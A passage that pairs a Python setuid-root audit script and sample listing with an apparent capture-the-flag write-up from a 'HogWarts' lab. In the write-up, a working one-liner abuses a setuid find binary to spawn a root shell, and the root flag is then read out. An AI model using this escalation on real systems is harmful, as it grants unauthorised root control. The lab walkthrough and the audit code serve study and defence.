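def audit_suid(lines, baseline=BASELINE_SUID_ROOT):
    """Return, sorted, the setuid-root paths whose basename is not in the baseline."""
    findings = []
    for line in lines:
        rec = parse_ls_line(line)
        if rec is None or not rec["setuid"] or rec["owner"] != "root":
            continue
        if os.path.basename(rec["path"]) not in baseline:
            findings.append(rec["path"])
    return sorted(findings)


# Sample in the post's listing layout; the last line is a constructed
# non-SUID control entry.
SAMPLE_LISTING = """\
-rwsr-xr-x 1 root root 71K Aug 30  2020 /usr/bin/su
-rwsr-xr-x 1 root root 67K May 28  2020 /usr/bin/passwd  --->  Apple_Mac_OSX(03-2006)
-rwsr-xr-x 1 root root 179K Jul  8  2020 /usr/bin/sudo  --->  check_if_the_sudo_version_is_vulnerable
-rwsr-xr-x 1 root root 47K Jul 24  2020 /usr/bin/base32
-rwsr-xr-x 1 root root 313K Sep 30  2020 /usr/bin/find
-rwsr-xr-x 1 root root 31K Aug  3  2020 /usr/bin/pkexec
-rwsr-xr-- 1 root dip 386K Jul 23  2020 /usr/sbin/pppd
-rwsr-sr-x 1 root root 15K Oct  7  2020 /usr/lib/xorg/Xorg.wrap
-rwxr-xr-x 1 root root 35K Jan  1  2021 /usr/bin/example-nosuid
""".splitlines()

if __name__ == "__main__":
    for path in audit_suid(SAMPLE_LISTING):
        print(f"unexpected setuid-root binary: {path}")
```

Neither find nor base32 is setuid in a default Ubuntu install; the fix for such a hit is `chmod u-s` on the file and reinstalling the package from the distribution repository.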


The SUID bit on the find or base32 command can be used to escalate privileges.

www-data@HogWarts:/tmp$ /usr/bin/find . -exec /bin/sh -p \; -quit
/usr/bin/find . -exec /bin/sh -p \; -quit
# cd /root
cd /root
# ls -alh
ls -alh
total 32K
drwx------  4 root root 4.0K Nov  7  2020 .
drwxr-xr-x 20 root root 4.0K Nov  7  2020 ..
-rw-------  1 root root  162 Nov  7  2020 .bash_history
-rw-r--r--  1 root root 3.1K Aug 14  2019 .bashrc
drwx------  2 root root 4.0K Oct 22  2020 .cache
drwxr-xr-x  3 root root 4.0K Nov  7  2020 .local
-rw-r--r--  1 root root  161 Sep 16  2020 .profile
-rw-r--r--  1 root root 1.4K Nov  7  2020 proof.txt
# cat proof.txt
cat proof.txt
/bin/sh: 3: cat: not found
# more proof.txt
more proof.txt
                                         _ __
        ___                             | '  \
   ___  \ /  ___         ,'\_           | .-. \        /|
   \ /  | |,'__ \  ,'\_  |   \          | | | |      ,' |_   /|
 _ | |  | |\/  \ \ |   \ | |\_|    _    | |_| |   _ '-. .-',' |_   _
// | |  | |____| | | |\_|| |__    //    |     | ,'_`. | | '-. .-',' `. ,'\_
\\_| |_,' .-, _  | | |   | |\ \  //    .| |\_/ | / \ || |   | | / |\  \|   \
 `-. .-'| |/ / | | | |   | | \ \//     |  |    | | | || |   | | | |_\ || |\_|
   | |  | || \_| | | |   /_\  \ /      | |`    | | | || |   | | | .---'| |
   | |  | |\___,_\ /_\ _      //       | |     | \_/ || |   | | | |  /\| |
   /_\  | |           //_____//       .||`      `._,' | |   | | \ `-' /| |
        /_\           `------'        \ |   AND        `.\  | |  `._,' /_\
                                       \|       THE          `.\
                                            _  _  _  _  __ _  __ _ /_
                                           (_`/ \|_)/ '|_ |_)|_ |_)(_
                                           ._)\_/| \\_,|__| \|__| \ _)
                                                           _ ___ _      _
                                                          (_` | / \|\ ||__
                                                          ._) | \_/| \||___


root{63a9f0ea7bb98050796b649e85481845!!}
# 


Privilege escalation succeeded and the root flag was obtained.

From: https://www.cnblogs.com/jason-huawen/p/17054118.html
